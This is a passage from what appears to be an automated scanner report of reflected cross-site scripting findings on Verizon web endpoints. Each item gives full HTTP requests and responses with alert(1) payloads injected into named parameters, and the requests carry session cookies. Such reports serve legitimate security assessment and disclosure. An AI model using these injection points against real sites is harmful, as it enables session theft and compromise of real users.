Set-Cookie: VZCSESSIONID=tJRbMnyY3CbLSg6h2jR6dxjvj3LwGxBkZF7LyXnM5TCF48L4p6G4!-1123586183; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout26041";alert(1)//db67067f088";
</script>

3.91. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e18"%3balert(1)//1ba31d2c96 was submitted in the channel parameter. This input was echoed as c3e18";alert(1)//1ba31d2c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18"%3balert(1)//1ba31d2c96 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 220
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=N0LMMntDQ3RpWt1Ch6H3NPdJYM9gz6cJ23S2zTrpNkZFPldZyDTL!-732060938; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18";alert(1)//1ba31d2c96";
</script>

3.92. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28952"%3balert(1)//a64a12a87fe was submitted in the clientid parameter. This input was echoed as 28952";alert(1)//a64a12a87fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr28952"%3balert(1)//a64a12a87fe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=Sy2TMntffpm2wv5r2R1yT69GzhdMh6QTMyJDyYQztYdx8gR8vbmG!396615442; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr28952";alert(1)//a64a12a87fe&channel=Nwcnsmr";
</script>

3.93. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17699"%3balert(1)//ab8a8ea1a80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17699";alert(1)//ab8a8ea1a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&17699"%3balert(1)//ab8a8ea1a80=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=7g52MnyYqTy13KL31X5pnlsmbPLtrhtyjyP8rXxwQ66gzGgkcvRT!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&17699";alert(1)//ab8a8ea1a80=1";
</script>

3.94. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e720"%3balert(1)//81de72d4a66 was submitted in the q parameter. This input was echoed as 4e720";alert(1)//81de72d4a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='4e720"%3balert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=0h8GMntdpL8cWDx9D4hWqZ5N1YLxWM7dWJj4G1SnRG8pZrG7PSc9!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='4e720";alert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.95. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12a04"%3balert(1)//4994f840c79 was submitted in the web_search_type parameter. This input was echoed as 12a04";alert(1)//4994f840c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic12a04"%3balert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=vnznMntdnppz3b1fGRLzPLpJCkPys1C1rnTyhKdsftXNHrRpy26h!-1123586183; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic12a04";alert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.96. http://www.verizon.net/central/bookmark [WT.ti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2114"-alert(1)-"2cd6e3349c6 was submitted in the WT.ti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:43 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6";
</script>

3.97. http://www.verizon.net/central/bookmark [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a257"-alert(1)-"dfffcb2575a was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a";
</script>

3.98. http://www.verizon.net/central/bookmark [clientid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff42"-alert(1)-"af559367478 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr";
</script>

3.99. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac8b"-alert(1)-"6833c2efbb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:45 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1";
</script>

3.100. http://www.verizon.net/central/bookmark [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5125b"-alert(1)-"3649764250f was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:36 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.101. http://www.verizon.net/central/bookmark [web_search_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63d6b"-alert(1)-"fda7c8459b2 was submitted in the web_search_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
